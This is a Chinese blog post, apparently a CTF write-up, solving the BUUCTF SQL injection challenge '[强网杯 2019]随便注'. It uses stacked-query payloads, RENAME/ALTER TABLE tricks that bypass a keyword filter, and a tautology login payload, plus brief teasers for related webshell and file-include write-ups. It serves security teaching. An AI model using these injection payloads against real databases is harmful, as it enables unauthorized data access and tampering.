当前位置:首页 > CTF > BUU > 正文内容

BUUCTF_web_第二题:[强网杯 2019]随便注

七星3个月前 (01-21)BUU147

第二题: [强网杯 2019]随便注

测试一下, 1'# 返回正常, 发现是字符注入,尝试show一下database:

1';show databases;%23

发现出结果了:

得到了所有的数据库, 那就再看看当前使用的数据库中有哪些表喽:

?inject=1';show tables;%23

两个表, 分别看看里面有啥:

?inject=1';show columns from `1919810931114514`;%23

?inject=1';show columns from `words`;%23

默认查询的是worlds, 但是flag在一串数字的表里面, 所以我们可以select一下, 但是发现:

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

他过滤了一堆东西.

所以思路就有了, 尝试一下堆叠注入, 可以, 所以我们就构造下面的payload:

1%27%3BRENAME+TABLE+%60words%60+TO+%60words1%60%3BRENAME+TABLE+%601919810931114514%60+TO+%60words%60%3BALTER+TABLE+%60words%60+CHANGE+%60flag%60+%60id%60+VARCHAR%28100%29+CHARACTER+SET+utf8+COLLATE+utf8_general_ci+NOT+NULL%3Bshow+columns+from+words%3B%2523

读一下也简单,

1';
RENAME  TABLE  `words`  TO  `words1`;
RENAME  TABLE  `1919810931114514`  TO  `words`;
ALTER  TABLE  `words`  CHANGE  `flag`  `id`  VARCHAR(100)  CHARACTER  SET  utf8  COLLATE  utf8_general_ci  NOT  NULL;
show  columns  from  words;
%23 

 先把 words表名改为 words1,再把一串数字表改为words,然后把新的 words 表里的 flag 列名改为 id ,这样就可以直接查询 flag 了:

1%27+or+%271%27%3D%271

直接获得弗拉格.

转载请声名出处|qixingbit.com

相关文章

BUUCTF_web_第六题:[ACTF2020 新生赛]Include

BUUCTF_web_第六题:[ACTF2020 新生赛]Include

发现是一道include的题, 啥提示也没有,点一下给个tips, 获取到一个?file=flag.php很自然想到了include可以把文件base64再读取文件:/?file=php:/...

BUUCTF_web_第七题:[极客大挑战 2019]Secret File

BUUCTF_web_第七题:[极客大挑战 2019]Secret File

f12, 获得Archive_room.php访问, 嗯, 他说什么什么快没看清, 不要紧, 我们可以让他慢下来开burpsuite, 抓取回显包, 得到secr3t.php访问,成功获得源码high...

BUUCTF_web_第12题:[极客大挑战 2019]Knife

BUUCTF_web_第12题:[极客大挑战 2019]Knife

本题考查了中国菜刀的使用, 及简单一句话理解阅读题目打开, 发现给了一句话:直接用中国菜刀连上:在根目录下直接找到了flag...

BUUCTF_web_第八题:[极客大挑战 2019]LoveSQL

BUUCTF_web_第八题:[极客大挑战 2019]LoveSQL

打开之后, 和之前的类似, 万能密码 1' or 1=1#登录成功,给了一个admin和一串md5, md5解密失败.只能常规注入了.给了个灵魂试探:用 sqlmap 是没有灵魂的那就手工注入一下,巩...

BUUCTF_web_第11题:[护网杯 2018]easy_tornado

BUUCTF_web_第11题:[护网杯 2018]easy_tornado

开靶场, 有三个文件链接,依次点开, 有个提示:flag in /fllllllllllllag然后观察url发现,访问文件是需要提交一个filehash值的:/file?filename=/flag...

BUUCTF_web_第16题:[极客大挑战 2019]Upload

BUUCTF_web_第16题:[极客大挑战 2019]Upload

上传图片, 很自然想到图片马, 那就传个:然后发现提示:NO! HACKER! your file included '<?'过滤了<?那就是试试php语言的另一种写法:接着提示:Don'...

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。